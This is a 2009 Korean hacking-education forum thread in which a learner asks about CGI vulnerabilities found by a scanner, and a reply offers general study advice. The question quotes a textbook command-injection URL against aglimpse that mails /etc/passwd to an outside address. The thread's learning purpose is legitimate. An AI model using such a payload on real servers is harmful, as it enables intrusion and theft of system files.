시스템 해킹

1574,

9/79

Lenfried

cgi스캐너를 통한 취약점 분석에 대해 공부하려 합니다.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1071 [복사]

해쿨 책에 나와있는 md-webscan을 이용하여 검색이 되는 cgi취약점에 대해 공부하고 싶은데 관련 문서, exploit '소스'나 취약점 발생 이유에 대해 정리된 사이트가 있으면 가르쳐주셨으면 합니다.

해쿨메뉴얼 -리눅스편을 정독하고 있는데 274page 80번 포트를 이용하여 공격하는 방법 란에서
취약점을 가진 각 파일의 exploit와 설명이랑 뒷쪽의 finger.cgi를 이용한 실습에서
주소에 대한 차이라던가에 의해 잘 이해가 되질 않습니다;
(/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5ilchuks\@hanmail.net\</etc/passwd;eval$CMD;echo) 에서 왜 저렇게 쳐야하는지 각 문구의 의미도 궁금하고...

figner.cgi 실습쪽엔 주소가
(http://ftz.myip.org/~realhack/cgi-bin/finger.cgi?user=mirable)라고 되어있는데
호스트/~realhack 이부분은 finger.cgi 파일의 위치가 cgi-bin 안에 없기 때문에 저렇게 되어있는건지 user=mirable는 mirable라는 계정을 가지고 있다는 전제하이기 때문인지 등등 사소한 부분에서 이해가 가질 않네요;

복잡한 질문이지만 친절히 답변해주시면 감사히 읽겠습니다~

Hit : 4907 Date : 2009/03/29 05:30


md.house	해커스쿨에서 최근에 보아온 해킹 관련 질문중에 가장 제대로 된 질문이네요. 그냥 책 보고 깨작깨작 따라해보면서 뭐 짠 하고 나오면 우와 짱이다 나 이제 해커 초고수야 ㅋㅋ 이러는 초딩들이랑은 다른 수준의 질문입니다. 그러나 안타깝게도.. 님이 질문한 내용을 이해하려면 정말 많은 기반지식이 필요합니다. 우선 님이 지금 "인터넷 익스플로러" 라는 프로그램으로 이 화면을 보고 있을텐데요, 맨날 아무 생각없이 더블클릭해서 보는 이 "인터넷 익스플로러" 라는 프로그램이 무슨 일을 하는 프로그램인지, 왜 만들어졌는지를 알아야됩니다. 인터넷 익스플로러라는 프로그램을 좀 깊이있게 공부해보면 HTTP 라는 단어를 만나게 될겁니다. 인터넷 주소 쓸때 항상 맨 앞에 <a href=http:// 라고 target=_blank>http:// 라고</a> 쓰지요. 그 http 라는게 대체 뭔지를 알아야만 웹을 알 수 있게 됩니다. 이 과정에서 서비스, 서버, 클라이언트, 어플리케이션 뭐 이런 개념들을 같이 접하게 될겁니다. 일단 웹이 뭔지, http 가 뭔지, 인터넷 익스플로러가 무슨 일을 하는 프로그램인지를 알고나면 상당히 많은게 눈에 보이기 시작할겁니다. 그냥 네이버가서 아무거나 뭐 검색해보면 줄줄이 나오는 검색결과의 링크만 봐도 이게 뭐고 저게 뭔지 한 눈에 알 수 있게 될거구요, 이제 비로소 CGI 라는게 뭔지 알 수 있게 됩니다. 이 과정에서는 웹서버, DB서버, cgi, php, asp, jsp 뭐 이런 단어들을 접하게 될텐데 이쯤가면 이제 프로그래밍으로 넘어가게 됩니다. 컴퓨터라는 물건을 움직이는건 결국은 프로그램이고 소프트웨어입니다. 컴퓨터를 깊이있게 다루려면 프로그래밍을 안할수가 없겠죠. 하물며 컴퓨터기술의 정수라 할 수 있는 해킹/보안 분야에서는 말할 필요도 없이 프로그래밍 스킬이 있어야됩니다. CGI 가 뭔지는 알겠는데.. 그래서 그게 어쨌다고? 하는 시점이 오면, 이제 CGI 를 직접 만들어볼 차례가 되죠. CGI 를 만들려면 우선 웹서버 설치하는 방법부터 알아야되고, 설치를 했으면 설정하고 운영하는 법도 알아야되고, 그럼 웹페이지도 만들어봐야되고, 이제 CGI 도 만들어보게 됩니다. 여기까지 오시면 님의 모든 질문이 해결됩니다.	2009/03/29
Lenfried	친절한 답변 감사합니다. 나열해주신 키워드를 토대로 말씀해주신 순서대로 공부를 좀 더 해봐야겠군요.	2009/03/29